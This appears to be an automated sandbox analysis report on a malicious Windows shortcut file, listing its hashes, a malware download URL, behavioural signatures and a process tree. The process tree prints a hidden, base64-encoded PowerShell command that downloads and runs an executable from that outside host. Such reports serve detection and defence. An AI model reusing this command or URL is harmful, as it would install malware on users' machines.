Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
22-05-2024 01:35
Static task
static1
Behavioral task
behavioral1
Sample
olineformN98898778.lnk
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
olineformN98898778.lnk
Resource
win10v2004-20240508-en
General
-
Target
olineformN98898778.lnk
-
Size
1KB
-
MD5
04e0fea48dfed1e026c3104e0d6aff88
-
SHA1
e639b0f5a486d5dffef28373ca2df867f99e7fb2
-
SHA256
76a5649587a8874b1b1a5b3a37d281a4194e8a19947ca33f2d12d12d53509d39
-
SHA512
c9e5ff0b7d9ddd4b47a57438115acd29338bc5c1e98c9a5f3a61405de90a43eea60c3b1ecf0c25326d4a506b4ae2e2970e794a2f5e1c4d911e89aeed73dbeba4
Malware Config
Extracted
http://gpower.5gbfree.com/pix.exe
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2532 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2532 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 2368 wrote to memory of 2532 2368 cmd.exe powershell.exe PID 2368 wrote to memory of 2532 2368 cmd.exe powershell.exe PID 2368 wrote to memory of 2532 2368 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\olineformN98898778.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQAgAEIAaQB0AHMAVAByAGEAbgBzAGYAZQByADsAIABzAHQAYQByAHQAIAAiAHcAaQBuAGcAYQB0AC4AZQB4AGUAIgA7ACAAUwB0AGEAcgB0AC0AQgBpAHQAcwBUAHIAYQBuAHMAZgBlAHIAIABoAHQAdABwADoALwAvAGcAcABvAHcAZQByAC4ANQBnAGIAZgByAGUAZQAuAGMAbwBtAC8AcABpAHgALgBlAHgAZQAgACIAJABlAG4AdgA6AFQARQBNAFAAXAB3AGkAbgBnAGEAdAAuAGUAeABlACIAOwAgAHMAdABhAHIAdAAgACIAJABlAG4AdgA6AFQARQBNAFAAXAB3AGkAbgBnAGEAdAAuAGUAeABlACIA2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2532-38-0x000007FEF5DDE000-0x000007FEF5DDF000-memory.dmpFilesize
4KB
-
memory/2532-39-0x000000001B4D0000-0x000000001B7B2000-memory.dmpFilesize
2.9MB
-
memory/2532-43-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmpFilesize
9.6MB
-
memory/2532-42-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmpFilesize
9.6MB
-
memory/2532-41-0x0000000001F60000-0x0000000001F68000-memory.dmpFilesize
32KB
-
memory/2532-40-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmpFilesize
9.6MB
-
memory/2532-44-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmpFilesize
9.6MB
-
memory/2532-45-0x0000000002CB0000-0x0000000002CD2000-memory.dmpFilesize
136KB
-
memory/2532-46-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmpFilesize
9.6MB
-
memory/2532-47-0x00000000028B0000-0x00000000028C2000-memory.dmpFilesize
72KB
-
memory/2532-48-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmpFilesize
9.6MB